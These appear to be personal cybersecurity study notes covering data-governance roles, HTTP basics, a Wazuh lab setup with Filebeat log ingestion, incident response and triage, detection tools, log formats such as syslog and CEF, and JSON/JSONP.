Roles of the various team members who are a part of the incident escalation process.

Data owners

A data owner is the person that decides who can access, edit, use, or destroy their information. Data owners have administrative control over specific information hardware or software and are accountable for the classification, protection, access, and use of company data. For example, consider a situation where an employee gains unauthorized access to software they do not need to use for work. This kind of security event would be escalated to the data owner of that software.

Data controllers

Data controllers determine the procedure and purpose for processing data. This role largely focuses on collecting the personal information of customers. The data controller determines how that data is used. The data controller also ensures that data is used, stored, and processed in accordance with relevant security and privacy regulations. If sensitive customer information was at risk, that event would be escalated to data controllers.

Data processors

Data processors report directly to the data controller and are responsible for processing the data on behalf of the data controller. The data processor is typically a vendor and is often tasked with installing security measures to help protect the data. Data processing issues are typically escalated to the individual who oversees the third-party organization responsible for data processing.

Data custodians

Data custodians assign and remove access to software or hardware. Custodians are responsible for implementing security controls for the data they are responsible for, granting and revoking access to that data, creating policies regarding how that data is stored and transmitted, advising on potential threats to that data, and monitoring the data. Data custodians are notified when data security controls need to be strengthened or have been compromised.

Data protection officers (DPOs)

Data protection officers are responsible for monitoring the internal compliance of an organization’s data protection procedures. These individuals advise the security team on the obligations required by the organization's data protection standards and procedures. They also conduct assessments to determine whether or not the security measures in place are properly protecting the data as necessary. DPOs are notified when set standards or protocols have been violated.

Stakeholders

A stakeholder is defined as an individual or group that has an interest in any decision or activity of an organization. A big part of what you’ll do as a security analyst is report your findings to various security stakeholders.

Levels of stakeholders

There are many levels of stakeholders within larger organizations. As an entry-level analyst, you might only communicate directly with a few of them. Although you might not communicate with all of the security stakeholders in an organization, it’s important to have an understanding of who key stakeholders are:

A cybersecurity risk manager is a professional responsible for leading efforts to identify, assess, and mitigate security risks within an organization.
A Chief Executive Officer, also known as the CEO, is the highest ranking person in an organization. You are unlikely to communicate directly with this stakeholder as an entry-level analyst.
A Chief Financial Officer, also known as the CFO, is another high-level stakeholder that you’re unlikely to communicate with directly.
A Chief Information Security Officer, also known as the CISO, is the highest level of security stakeholder. You are also unlikely to communicate directly with this stakeholder as an entry-level analyst.
An operations manager oversees the day-to-day security operations. These individuals lead teams related to the development and implementation of security strategies that protect an organization from cyber threats.
The legal counsel tracks applicable litigation and provides legal advice to the organization. To track litigation, they follow new and changing security legislation and regulations. They may also help address loss of secured data, legal penalties, and regulatory fines.

[Vault: Networking] HTTP

Tue, 09 Dec 2025 13:24:55 GMT

HTTP

HTTP is a plain-text protocol used for communicating with a web server and retrieving information, this information could be things such as HTML pages, CSS, JavaScript, images etc.

Developed by Tim Berners-Lee and his team between 1989-1991 ![[attachments/HTTP-img-202510091530.png]]

Headers

It's possible to make a request to a web server with just one line GET / HTTP/1.1. But for a much richer web experience, you’ll need to send other data as well. This other data is sent in what is called headers, where headers contain extra information to give to the web server you’re communicating with. Request Header

Request Method
The URI and the path-to-resource field: This represents the path portion of the requested URL.
The request version-number field: This specifies the version of HTTP used by the client.
Host: Some web servers host multiple websites so by providing the host headers you can tell it which one you require, otherwise you'll just receive the default website for the server.
The user agent: This is your browser software and version number, telling the web server your browser software helps it format the website properly for your browser and also some elements of HTML, JavaScript and CSS are only available in certain browsers.
Content-Length: When sending data to a web server such as in a form, the content length tells the web server how much data to expect in the web request. This way the server can ensure it isn't missing any data.
Accept-Encoding: Tells the web server what types of compression methods the browser supports so the data can be made smaller for transmitting over the internet.
Cookie: Data sent to the server to help remember your information (see cookies task for more information).
Several other fields: accept, accept-language, accept encoding, and other fields also appear.
HTTP requests always end with a blank line to inform the web server that the request has finished. Response Header
Version of the HTTP protocol the server is using and then followed by the HTTP Status Code.
Server: This tells us the web server software and version number.
Date: The current date, time and timezone of the web server.
Content-Type: tells the client what sort of information is going to be sent, such as HTML, images, videos, pdf, XML.
Content-Length: tells the client how long the response is, this way we can confirm no data is missing.
Content-Encoding: What method has been used to compress the data to make it smaller when sending it over the internet.
Set-Cookie: Information to store which gets sent back to the web server on each request (see cookies task for more information).
Cache-Control: How long to store the content of the response in the browser's cache before it requests it again.

Request Methods

- GET: Retrieves information from the server
- HEAD: Basically the same as GET but returns only HTTP headers and no document body
- POST: Sends data to the server (typically using HTML forms, API requests, and so on)
- TRACE: Does a message loopback test along the path to the target resource
- PUT: Uploads a representation of the specified URI . This method is used to update content on a server. - DELETE: Deletes the specified resource
- OPTIONS: Returns the HTTP methods that the server supports
- CONNECT: Converts the request connection to a transparent TCP/IP tunnel.

HTTP URL Structure

URL : Uniform Resource Locator

Scheme: This is the portion of the URL that designates the underlying protocol to be used (for example, HTTP, FTP); it is followed by a colon and two forward slashes ( // ).
User: Some services require authentication to log in, you can put a username and password into the URL to log in.
Host: This is the IP address (numeric or DNS-based) for the web server being accessed; it usually follows the colon and two forward slashes.
Port: This optional portion of the URL designates the port number to which the target web server listens. (The default port number for HTTP servers is 80, but some configurations are set up to use an alternate port number.)
Path: This is the path from the “root” directory of the server to the desired resource. In this case, you can see that there is a directory called dir. (Keep in mind that, in reality, web servers may use aliasing to point to documents, gateways, and services that are not explicitly accessible from the server’s root directory.)
Path-segment-params: This is the portion of the URL that includes optional name/value pairs (that is, path segment parameters). A path segment parameter is typically preceded by a semicolon (depending on the programming language used), and it comes immediately after the path information. Path segment parameters are not commonly used. In addition, it is worth mentioning that these parameters are different from query-string parameters (often referred to as URL parameters ).
Query-string: This optional portion of the URL contains name/value pairs that represent dynamic parameters associated with the request. These parameters are commonly included in links for tracking and context-setting purposes. They may also be produced from variables in HTML forms. Typically, the query string is preceded by a question mark. Equals signs (=) separate names and values, and ampersands ( & ) mark the boundaries between name/value pairs.
Fragment: This is a reference to a location on the actual page requested. This is commonly used for pages with long content and can have a certain part of the page directly linked to it, so it is viewable to the user as soon as they access the page. (eg: example.com/#heading1)

Web Server Response Codes

When a web server responds to a request it sends a 3 digit status code which lets the client know the result of the request.

1xx: Information

| Message: | Description: | | ----------------------- | ----------------------------------------------------------------------------------------------------------------- | | 100 Continue | The server has received the request headers, and the client should proceed to send the request body | | 101 Switching Protocols | The requester has asked the server to switch protocols | | 103 Early Hints | Used with the Link header to allow the browser to start preloading resources while the server prepares a response |

2xx: Successful

| Message: | Description: | | --------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- | | 200 OK | The request is OK (this is the standard response for successful HTTP requests) | | 201 Created | The request has been fulfilled, and a new resource is created | | 202 Accepted | The request has been accepted for processing, but the processing has not been completed | | 203 Non-Authoritative Information | The request has been successfully processed, but is returning information that may be from another source | | 204 No Content | The request has been successfully processed, but is not returning any content | | 205 Reset Content | The request has been successfully processed, but is not returning any content, and requires that the requester reset the document view | | 206 Partial Content | The server is delivering only part of the resource due to a range header sent by the client |

3xx: Redirection

|Message:|Description:| |---|---| |300 Multiple Choices|A link list. The user can select a link and go to that location. Maximum five addresses| |301 Moved Permanently|The requested page has moved to a new URL| |302 Found|The requested page has moved temporarily to a new URL| |303 See Other|The requested page can be found under a different URL| |304 Not Modified|Indicates the requested page has not been modified since last requested| |307 Temporary Redirect|The requested page has moved temporarily to a new URL| |308 Permanent Redirect|The requested page has moved permanently to a new URL|

4xx: Client Error

|Message:|Description:| |---|---| |400 Bad Request|The request cannot be fulfilled due to bad syntax| |401 Unauthorized|The request was a legal request, but the server is refusing to respond to it. For use when authentication is possible but has failed or not yet been provided| |402 Payment Required|Reserved for future use| |403 Forbidden|The request was a legal request, but the server is refusing to respond to it| |404 Not Found|The requested page could not be found but may be available again in the future| |405 Method Not Allowed|A request was made of a page using a request method not supported by that page| |406 Not Acceptable|The server can only generate a response that is not accepted by the client| |407 Proxy Authentication Required|The client must first authenticate itself with the proxy| |408 Request Timeout|The server timed out waiting for the request| |409 Conflict|The request could not be completed because of a conflict in the request| |410 Gone|The requested page is no longer available| |411 Length Required|The "Content-Length" is not defined. The server will not accept the request without it| |412 Precondition Failed|The precondition given in the request evaluated to false by the server| |413 Request Too Large|The server will not accept the request, because the request entity is too large| |414 Request-URI Too Long|The server will not accept the request, because the URI is too long. Occurs when you convert a POST request to a GET request with a long query information| |415 Unsupported Media Type|The server will not accept the request, because the media type is not supported| |416 Range Not Satisfiable|The client has asked for a portion of the file, but the server cannot supply that portion| |417 Expectation Failed|The server cannot meet the requirements of the Expect request-header field|

5xx: Server Error

|Message:|Description:| |---|---| |500 Internal Server Error|A generic error message, given when no more specific message is suitable| |501 Not Implemented|The server either does not recognize the request method, or it lacks the ability to fulfill the request| |502 Bad Gateway|The server was acting as a gateway or proxy and received an invalid response from the upstream server| |503 Service Unavailable|The server is currently unavailable (overloaded or down)| |504 Gateway Timeout|The server was acting as a gateway or proxy and did not receive a timely response from the upstream server| |505 HTTP Version Not Supported|The server does not support the HTTP protocol version used in the request| |511 Network Authentication Required|The client needs to authenticate to gain network access|

https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Status

Cookies

Cookies are small piece of data that is stored on your computer.

Cookies are saved when you receive a "Set-Cookie" header from a web server. Then every further request you make, you'll send the cookie data back to the web server.
Cookies can be used for many purposes but are most commonly used for website authentication. The cookie value won't usually be a clear-text string where you can see the password, but a token (unique secret code that isn't easily humanly guessable).

A REST API (or RESTful API) is a type of application programming interface (API) that conforms to the specification of the representational state transfer (REST) architectural style and allows for interaction with web services. REST APIs are used to build and integrate multiple-application software. In short, if you want to interact with a web service to retrieve information or add, delete, or modify data, an API helps you communicate with such a system in order to fulfill the request. REST APIs use JSON as the standard format for output and requests.

HTTP specs

[Vault: Tools] Wazuh

Tue, 09 Dec 2025 13:24:55 GMT

Part 1 - Deploy the Wazuh Virtual Machine

To use Wazuh, you will set up a local server on your computer using a virtual machine. This does not require a company email or any paid service.

Download and install Oracle VirtualBox to run the virtual machine.
Search online for "Wazuh virtual machine OVA" to find and download the pre-built Wazuh server file.
Open VirtualBox and go to File > Import Appliance...
Select the Wazuh .ova file you downloaded. Follow the prompts to import it.

![[attachments/_3e968639956d40b2840aab0888bc94f8_OracleVM-imported.png]]

Part 2 - Configure the Virtual Machine

Before you start the VM, you must configure its memory to prevent errors.

In the main VirtualBox window, select your imported Wazuh VM.
Click the Settings button.
Go to the System tab. Adjust the Base Memory slider to 4096 MB (4 GB). This is a critical step to ensure your computer has enough resources to run both your operating system and the VM.
Click OK to save the setting.

![[attachments/_2226974daee247dba549e0234ebd4103_Wazuh-Base-Memory.png]]

Part 3 - Access the Wazuh Dashboard

Now you will start the VM, configure a shared folder to get your data inside, and then access the dashboard from your browser.

Start the VM: Click the Start button in VirtualBox. Once it boots, you can press the right Ctrl key to get your mouse back from the VM's window.
Set Up Shared Folder: From the VirtualBox menu bar, go to Devices > Shared Folders > Shared Folders Settings...
- Click the Add new shared folder icon (green plus sign).
- For Folder Path, navigate to and select the tutorialdata folder you unzipped.
- For Folder Name, enter buttercup-shared. Ensure the Auto-mount box is checked and click OK.

![[attachments/_d37d55d80f744d2a8b9696972d3dc967_VM-Shared-Folder.png]]

Fix Permissions: After the VM boots, log in with root / wazuh (use these root credentials to access logs). Run the following commands to get the correct permissions for the shared folder:

usermod -aG vboxsf root
reboot

Log in and Access: After the VM reboots, log back in (with root credentials above). Run the command ip a to find your VM's IP address. The address will likely start with 192. Open a web browser on your computer and go to https://<your_VM_IP_address>. Allow and log in to the Wazuh dashboard with admin / admin.

Part 4 - Ingest and Analyze Data

Now that your VM is running, you can get the data in for analysis.

Access the Data: In the VM's command line, run cd /media/sf_buttercup-shared. The sf_ prefix is added by VirtualBox to denote the shared folder.
Create Ingestion File: Run nano ingest.yml and copy/paste the following content. Note: This is a YAML file; be precise with your spacing.

filebeat.inputs:
- type: log
  enabled: true
  paths:
    - /media/sf_buttercup-shared/mailsv/*.log
    - /media/sf_buttercup-shared/vendor_sales/*.csv
    - /media/sf_buttercup-shared/www1/*.log
    - /media/sf_buttercup-shared/www2/*.log
    - /media/sf_buttercup-shared/www3/*.log
output.logstash:
  hosts: ["localhost:5044"]

![[attachments/_f5e44e3be33c4b99bb959a3f34e21b5e_Nano-File.png]]

Press Ctrl+X, then type Y, and press Enter to save.

Run Ingestion: Run /usr/share/filebeat/bin/filebeat -c ingest.yml -e. The command will process your logs and send them to the dashboard.
Verify & Analyze: After the command finishes, go to your browser. If you don't see logs immediately, wait a few minutes and refresh.

Go back to the Dashboard and locate the Discover option under the Explore option.
In the time range, choose Absolute, select a very old start date (e.g., January 1, 2000), and click Update.
In the search bar, type * and press Enter. You are now ready to answer the questions in the activity. Note: If you get less than 100 hits, you should revise the steps above.

You're done! Once your Wazuh environment is set up

[Vault: Defence and Response] Incident Response

Mon, 08 Dec 2025 19:12:35 GMT

Incident

An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures or acceptable use policies

Incident Response Lifecycle

Incident lifecycle frameworks provide a structure to support incident response operations. Frameworks help organizations develop a standardized approach to their incident response process, so that incidents are managed in an effective and consistent way. There are many different types of frameworks that organizations can adopt and modify according to their needs. eg: NIST CSF

The NIST incident response lifecycle is another NIST framework with additional substeps dedicated to incident response. It begins with preparation. Next, detection and analysis, and then containment, eradication and recovery, and finally post-incident activity.

Incident response playbook

Incident response is an organization's quick attempt to identify an attack, contain the damage, and correct the effects of a security breach. An incident response playbook is a guide with six phases used to help mitigate and manage security incidents from beginning to end.

Preparation: Organizations must prepare to mitigate the likelihood, risk, and impact of a security incident by documenting procedures, establishing staffing plans, and educating users.
Detection and analysis: The objective of this phase is to detect and analyze events using defined processes and technology to determine whether a breach has occurred and analyze its possible magnitude.
Containment: The goal of containment is to prevent further damage and reduce the immediate impact of a security incident.
Eradication and recovery: involves the complete removal of an incident's artifacts so that an organization can return to normal operations.
Post-incident activity: includes documenting the incident, informing organizational leadership, and applying lessons learned to ensure that an organization is better prepared to handle future incidents.
Coordination: involves reporting incidents and sharing information, throughout the incident response process, based on the organization's established standards. It ensures that organizations meet compliance requirements and it allows for coordinated response and resolution.

Playbooks are generally used alongside [[SIEM]] tools. If, for example, unusual user behavior is flagged by a SIEM tool, a playbook provides analysts with instructions about how to address the issue. SOAR tools are similar to SIEM tools in that they are used for threat monitoring. SOAR is a piece of software used to automate repetitive tasks generated by tools such as a SIEM or managed detection and response (MDR). For example, if a user attempts to log into their computer too many times with the wrong password, a SOAR would automatically block their account to stop a possible intrusion.

Incident response Documentation

Security teams use documentation to support investigations, complete tasks, and communicate findings. Effective documentation has three benefits: Transparency, Standardization, Clarity

At a minimum, incident response documentation should describe the incident by covering the 5 W's of incident investigation: who, what, where, why, and when. The details that are captured during incident response are important for developing additional documents during the end of the lifecycle.

Computer security incident response teams (CSIRT)

A specialized group of security professionals that are trained in incident management and response. The goals of CSIRTs are to effectively and efficiently manage incidents, prevent future incidents from occurring, and provide services and resources for response and recovery.

For incident response to be effective and efficient, there must be clear command, control, and communication of the situation to achieve the desired goal.

Command refers to having the appropriate leadership and direction to oversee the response.
Control refers to the ability to manage technical aspects during incident response, like coordinating resources and assigning tasks.
Communication refers to the ability to keep stakeholders informed.

Roles in CSIRT:

Security analyst

The job of the security analyst is to continuously monitor an environment for any security threats. This includes:

Analyzing and triaging alerts
Performing root-cause investigations
Escalating or resolving alerts If a critical threat is identified, then analysts escalate it to the appropriate team lead, such as the technical lead.

Technical lead

The job of the technical lead is to manage all of the technical aspects of the incident response process, such as applying software patches or updates. They do this by first determining the root cause of the incident. Then, they create and implement the strategies for containing, eradicating, and recovering from the incident. Technical leads often collaborate with other teams to ensure their incident response priorities align with business priorities, such as reducing disruptions for customers or returning to normal operations.

Incident coordinator

Responding to an incident also requires cross-collaboration with nonsecurity professionals. CSIRTs will often consult with and leverage the expertise of members from external departments. The job of the incident coordinator is to coordinate with the relevant departments during a security incident. By doing so, the lines of communication are open and clear, and all personnel are made aware of the incident status. Incident coordinators can also be found in other teams, like the SOC.

Other roles

Depending on the organization, many other roles can be found in a CSIRT, including a dedicated communications lead, a legal lead, a planning lead, and more.

Security Operations Centre - [[SOC]]

[[Incident response tools]]

Incident Response Plan

A document that outlines the procedures to take in each step of incident response

Post-incident review

The Post-incident activity phase of the NIST Incident Response Lifecycle is the process of reviewing an incident to identify areas for improvement during incident handling. This is typically done through a lessons learned meeting, also known as a post-mortem. A lessons learned meeting includes all involved parties after a major incident. The purpose of this meeting is to evaluate the incident in its entirety, assess the response actions, and identify any areas of improvement. It provides an opportunity for an organization and its people to learn and improve, not to assign blame. This meeting should be scheduled no later than two weeks after an incident has been successfully remediated.

Final report

One of the most essential forms of documentation that gets created during the end of an incident is the final report. The final report provides a comprehensive review of an incident. Final reports are not standardized, and their formats can vary across organizations. Additionally, multiple final reports can be created depending on the audience it’s written for. Here are some examples of common elements found in a final report:

Executive summary: A high-level summary of the report including the key findings and essential facts related to the incident
Timeline: A detailed chronological timeline of the incident that includes timestamps dating the sequence of events that led to the incident
Investigation: A compilation of the actions taken during the detection and analysis of the incident. For example, analysis of a network artifact such as a packet capture reveals information about what activities happen on a network.
Recommendations: A list of suggested actions for future prevention

[Vault: Defence and Response] Incident response tools

Mon, 08 Dec 2025 19:12:35 GMT

IDS

An intrusion detection system (IDS) is an application that monitors system activity and alerts on possible intrusions. An IDS provides continuous monitoring of network events to help protect against security threats or attacks. The goal of an IDS is to detect potential malicious activity and generate an alert once such activity is detected. An IDS does not stop or prevent the activity. Instead, security professionals will investigate the alert and act to stop it, if necessary. eg:

Snort
Zeek
Sagan
Suricata
Kismet Depending on the location you choose to set up an IDS, it can be either host-based or network-based.

Host-based intrusion detection system

A host-based intrusion detection system (HIDS) is an application that monitors the activity of the host on which it's installed. A HIDS is installed as an agent on a host. A host is also known as an endpoint, which is any device connected to a network like a computer or a server. Typically, HIDS agents are installed on all endpoints and used to monitor and detect security threats. A HIDS monitors internal activity happening on the host to identify any unauthorized or abnormal behavior. If anything unusual is detected, such as the installation of an unauthorized application, the HIDS logs it and sends out an alert. In addition to monitoring inbound and outbound traffic flows, HIDS can have additional capabilities, such as monitoring file systems, system resource usage, user activity, and more.

Network-based intrusion detection system

A network-based intrusion detection system (NIDS) is an application that collects and monitors network traffic and network data. NIDS software is installed on devices located at specific parts of the network that you want to monitor. The NIDS application inspects network traffic from different devices on the network. If any malicious network traffic is detected, the NIDS logs it and generates an alert.

Detection techniques

Detection systems can use different techniques to detect threats and attacks. The two types of detection techniques that are commonly used by IDS technologies are signature-based analysis and anomaly-based analysis.

Signature-based analysis

Signature analysis, or signature-based analysis, is a detection method that is used to find events of interest. A signature is a pattern that is associated with malicious activity. Signatures can contain specific patterns like a sequence of binary numbers, bytes, or even specific data like an IP address.

Different types of signatures can be used depending on which type of threat or attack you want to detect. For example, an anti-malware signature contains patterns associated with malware. This can include malicious scripts that are used by the malware. IDS tools will monitor an environment for events that match the patterns defined in this malware signature. If an event matches the signature, the event gets logged and an alert is generated.

Advantages

Low rate of false positives: Signature-based analysis is very efficient at detecting known threats because it is simply comparing activity to signatures. This leads to fewer false positives. Remember that a false positive is an alert that incorrectly detects the presence of a threat.

Disadvantages

Signatures can be evaded: Signatures are unique, and attackers can modify their attack behaviors to bypass the signatures. For example, attackers can make slight modifications to malware code to alter its signature and avoid detection.
Signatures require updates: Signature-based analysis relies on a database of signatures to detect threats. Each time a new exploit or attack is discovered, new signatures must be created and added to the signature database.
Inability to detect unknown threats: Signature-based analysis relies on detecting known threats through signatures. Unknown threats can't be detected, such as new malware families or zero-day attacks, which are exploits that were previously unknown.

Anomaly-based analysis

Anomaly-based analysis is a detection method that identifies abnormal behavior. There are two phases to anomaly-based analysis: a training phase and a detection phase. In the training phase, a baseline of normal or expected behavior must be established. Baselines are developed by collecting data that corresponds to normal system behavior. In the detection phase, the current system activity is compared against this baseline. Activity that happens outside of the baseline gets logged, and an alert is generated.

Advantages

Ability to detect new and evolving threats: Unlike signature-based analysis, which uses known patterns to detect threats, anomaly-based analysis can detect unknown threats.

Disadvantages

High rate of false positives: Any behavior that deviates from the baseline can be flagged as abnormal, including non-malicious behaviors. This leads to a high rate of false positives.
Pre-existing compromise: The existence of an attacker during the training phase will include malicious behavior in the baseline. This can lead to missing a pre-existing attacker.

IPS

An intrusion prevention system (IPS) is an application that monitors system activity for intrusive activity and takes action to stop the activity. An IPS works similarly to an IDS. But, IPS monitors system activity to detect and alert on intrusions, and it also takes action to prevent the activity and minimize its effects. For example, an IPS can send an alert and modify an access control list on a router to block specific traffic on a server. Many IDS tools can also operate as an IPS. Tools like Suricata, Snort, and Sagan have both IDS and IPS capabilities.

EDR

Endpoint detection and response (EDR) is an application that monitors an endpoint for malicious activity. EDR tools are installed on endpoints. Remember that an endpoint is any device connected on a network. Examples include end-user devices, like computers, phones, tablets, and more.

EDR tools monitor, record, and analyze endpoint system activity to identify, alert, and respond to suspicious activity. Unlike IDS or IPS tools, EDRs collect endpoint activity data and perform behavioral analysis to identify threat patterns happening on an endpoint. Behavioral analysis uses the power of machine learning and artificial intelligence to analyze system behavior to identify malicious or unusual activity. EDR tools also use automation to stop attacks without the manual intervention of security professionals. For example, if an EDR detects an unusual process starting up on a user’s workstation that normally is not used, it can automatically block the process from running.

Tools like Open EDR®, Bitdefender™ Endpoint Detection and Response, and FortiEDR™ are examples of EDR tools.

[[SIEM]]

A Security Information and Event Management (SIEM) system collects and analyzes security alerts, logs and other real-time and historical data from security devices on the network to facilitate early detection of cyber attacks.

[Vault: Defence and Response] Log Analysis

Mon, 08 Dec 2025 19:12:35 GMT

Data sources such as devices generate data in the form of events. A log is a record of events that occur within an organization's systems. Logs contain log entries and each entry details information corresponding to a single event that happened on a device or system.

Log analysis is the process of examining logs to identify events of interest Logs help uncover the details surrounding the 5 W's of incident investigation: who triggered the incident, what happened, when the incident took place, where the incident took place, and why the incident occurred.

Types of logs

Depending on the data source, different log types can be produced. Here’s a list of some common log types that organizations should record:

Network: Network logs are generated by network devices like firewalls, routers, or switches.
System: System logs are generated by operating systems like Chrome OS™, Windows, Linux, or macOS®.
Application: Application logs are generated by software applications and contain information relating to the events occurring within the application such as a smartphone app.
Security: Security logs are generated by various devices or systems such as antivirus software and intrusion detection systems. Security logs contain security-related information such as file deletion.
Authentication: Authentication logs are generated whenever authentication occurs such as a successful login attempt into a computer.

Log management

Because all devices produce logs, it can quickly become overwhelming for organizations to keep track of all the logs that are generated. To get the most value from your logs, you need to choose exactly what to log, how to access it easily, and keep it secure using log management. Log management is the process of collecting, storing, analyzing, and disposing of log data.

What to log

The most important aspect of log management is choosing what to log. Organizations are different, and their logging requirements can differ too. It's important to consider which log sources are most likely to contain the most useful information depending on your event of interest. This might be configuring log sources to reduce the amount of data they record, such as excluding excessive verbosity. Some information, including but not limited to phone numbers, email addresses, and names, form personally identifiable information (PII), which requires special handling and in some jurisdictions might not be possible to be logged.

The issue with overlogging

From a security perspective, it can be tempting to log everything. This is the most common mistake organizations make. Just because it can be logged, doesn't mean it needs to be logged. Storing excessive amounts of logs can have many disadvantages with some SIEM tools. For example, overlogging can increase storage and maintenance costs. Additionally, overlogging can increase the load on systems, which can cause performance issues and affect usability, making it difficult to search for and identify important events.

Log retention

Organizations might operate in industries with regulatory requirements. For example, some regulations require organizations to retain logs for set periods of time and organizations can implement log retention practices in their log management policy.

Log protection

Along with management and retention, the protection of logs is vital in maintaining log integrity. It’s not unusual for malicious actors to modify logs in attempts to mislead security teams and to even hide their activity. Storing logs in a centralized log server is a way to maintain log integrity. When logs are generated, they get sent to a dedicated server instead of getting stored on a local machine. This makes it more difficult for attackers to access logs because there is a barrier between the attacker and the log location.

Commonly used log formats: Syslog, [[JSON]], [[XML]], CSV, CEF

Syslog

Syslog is a standard for logging and transmitting data. It can be used to refer to any of its three different capabilities:

Protocol: The syslog protocol is used to transport logs to a centralized log server for log management. It uses port 514 for plaintext logs and port 6514 for encrypted logs.
Service: The syslog service acts as a log forwarding service that consolidates logs from multiple sources into a single location. The service works by receiving and then forwarding any syslog log entries to a remote server.
Log format: The syslog log format is one of the most commonly used log formats that you will be focusing on. It is the native logging format used in Unix® systems. It consists of three components: a header, structured-data, and a message.

Syslog log example

Here is an example of a syslog entry that contains all three components: a header, followed by structured-data, and a message: <236>1 2022-03-21T01:11:11.003Z virtual.machine.com evntslog - ID01 [user@32473 iut="1" eventSource="Application" eventID="9999"] This is a log entry!

Header The header contains details like the timestamp; the hostname, which is the name of the machine that sends the log; the application name; and the message ID.
- Timestamp: The timestamp in this example is 2022-03-21T01:11:11.003Z, where 2022-03-21 is the date in YYYY-MM-DD format. T is used to separate the date and the time. 01:11:11.003 is the 24-hour format of the time and includes the number of milliseconds 003. Z indicates the timezone, which is Coordinated Universal Time (UTC).
- Hostname: virtual.machine.com
- Application: evntslog
- Message ID: ID01
Structured-data The structured-data portion of the log entry contains additional logging information. This information is enclosed in square brackets and structured in key-value pairs. Here, there are three keys with corresponding values: [user@32473 iut="1" eventSource="Application" eventID="9999"].
Message The message contains a detailed log message about the event. Here, the message is This is a log entry!.
Priority (PRI) The priority (PRI) field indicates the urgency of the logged event and is contained with angle brackets. In this example, the priority value is <236> . Generally, the lower the priority level, the more urgent the event is.

CEF (Common Event Format)

Common Event Format (CEF) is a log format that uses key-value pairs to structure data and identify fields and their corresponding values. The CEF syntax is defined as containing the following fields:

cef
CEF:Version|Device Vendor|Device Product|Device Version|Signature ID|Name|Severity|Extension

Fields are all separated with a pipe character |. However, anything in the Extension part of the CEF log entry must be written in a key-value format. Syslog is a common method used to transport logs like CEF. When Syslog is used a timestamp and hostname will be prepended to the CEF message. Here is an example of a CEF log entry that details malicious activity relating to a worm infection:

Sep 29 08:26:10 host CEF:1|Security|threatmanager|1.0|100|worm successfully stopped|10|src=10.0.0.2 dst=2.1.2.2 spt=1232

Here is a breakdown of the fields:

Syslog Timestamp: Sep 29 08:26:10
Syslog Hostname: host
Version: CEF:1
Device Vendor: Security
Device Product: threatmanager
Device Version: 1.0
Signature ID: 100
Name: worm successfully stopped
Severity: 10
Extension: This field contains data written as key-value pairs. There are two IP addresses, src=10.0.0.2 and dst=2.1.2.2, and a source port number spt=1232. Extensions are not required and are optional to add.

This log entry contains details about a Security application called threatmanager that successfully stopped a worm from spreading from the internal network at 10.0.0.2 to the external network 2.1.2.2 through the port 1232. A high severity level of 10 is reported.

[Vault: Defence and Response] Triage

Mon, 08 Dec 2025 19:12:35 GMT

Incidents can have the potential to cause significant damage to an organization. Security teams must respond quickly and efficiently to prevent or limit the impact of an incident before it becomes too late. Triage is the prioritizing of incidents according to their level of importance or urgency. The triage process helps security teams evaluate and prioritize security alerts and allocate resources effectively so that the most critical issues are addressed first.

Triage Process

The triage process consists of three steps:

1. Receive and assess

During this first step of the triage process, a security analyst receives an alert from an alerting system like an intrusion detection system (IDS). You might recall that an IDS is an application that monitors system activity and alerts on possible intrusions. The analyst then reviews the alert to verify its validity and ensure they have a complete understanding of the alert.

This involves gathering as much information as possible about the alert, including details about the activity that triggered the alert, the systems and assets involved, and more. Here are some questions to consider when verifying the validity of an alert:

Is the alert a false positive? Security analysts must determine whether the alert is a genuine security concern or a false positive, or an alert that incorrectly detects the presence of a threat.
Was this alert triggered in the past? If so, how was it resolved? The history of an alert can help determine whether the alert is a new or recurring issue.
Is the alert triggered by a known vulnerability? If an alert is triggered by a known vulnerability, security analysts can leverage existing knowledge to determine an appropriate response and minimize the impact of the vulnerability.
What is the severity of the alert? The severity of an alert can help determine the priority of the response so that critical issues are quickly escalated.

2. Assign priority

Once the alert has been properly assessed and verified as a genuine security issue, it needs to be prioritized accordingly. Incidents differ in their impact, size, and scope, which affects the response efforts. To manage time and resources, security teams must prioritize how they respond to various incidents because not all incidents are equal. Here are some factors to consider when determining the priority of an incident:

Functional impact: Security incidents that target information technology systems impact the service that these systems provide to its users. For example, a ransomware incident can severely impact the confidentiality, availability, and integrity of systems. Data can be encrypted or deleted, making it completely inaccessible to users. Consider how an incident impacts the existing business functionality of the affected system.
Information impact: Incidents can affect the confidentiality, integrity, and availability of an organization’s data and information. In a data exfiltration attack, malicious actors can steal sensitive data. This data can belong to third party users or organizations. Consider the effects that information compromise can have beyond the organization.
Recoverability: How an organization recovers from an incident depends on the size and scope of the incident and the amount of resources available. In some cases, recovery might not be possible, like when a malicious actor successfully steals proprietary data and shares it publicly. Spending time, effort, and resources on an incident with no recoverability can be wasteful. It’s important to consider whether recovery is possible and consider whether it’s worth the time and cost. Note: Security alerts often come with an assigned priority or severity level that classifies the urgency of the alert based on a level of prioritization.

3. Collect and analyze

The final step of the triage process involves the security analyst performing a comprehensive analysis of the incident. Analysis involves gathering evidence from different sources, conducting external research, and documenting the investigative process. The goal of this step is to gather enough information to make an informed decision to address it. Depending on the severity of the incident, escalation to a level two analyst or a manager might be required. Level two analysts and managers might have more knowledge on using advanced techniques to address the incident.

Benefits of triage

By prioritizing incidents based on their potential impact, you can reduce the scope of impact to the organization by ensuring a timely response. Here are some benefits that triage has for security teams:

Resource management: Triaging alerts allows security teams to focus their resources on threats that require urgent attention. This helps team members avoid dedicating time and resources to lower priority tasks and might also reduce response time.
Standardized approach: Triage provides a standardized approach to incident handling. Process documentation, like playbooks, help to move alerts through an iterative process to ensure that alerts are properly assessed and validated. This ensures that only valid alerts are moved up to investigate.

[Vault: Web Security] JSON

Mon, 08 Dec 2025 19:12:35 GMT

JavaScript Object Notation (JSON): JSON is a lightweight format for storing and transporting data that is easy to understand.
It is the most common data structure in RESTful APIs and many other implementations.
You can interactively learn JSON at https://www.w3schools.com/whatis/whatis_json.asp.

[Vault: Web Security] JSONP

Mon, 08 Dec 2025 19:12:35 GMT

What is a callback in JSONP?

JSONP (JSON with Padding) is a technique used to overcome the same-origin policy in web browsers. It allows a web page to request data from a server in a different domain, which is usually restricted by the Same-Origin Policy.

The core idea of JSONP is this:

The client includes a <script> tag with a src pointing to a remote server.
The server responds with JavaScript code (not raw JSON), which invokes a function (callback) with the data as an argument.

Example:

<script src="https://example.com/data?callback=handleData"></script>

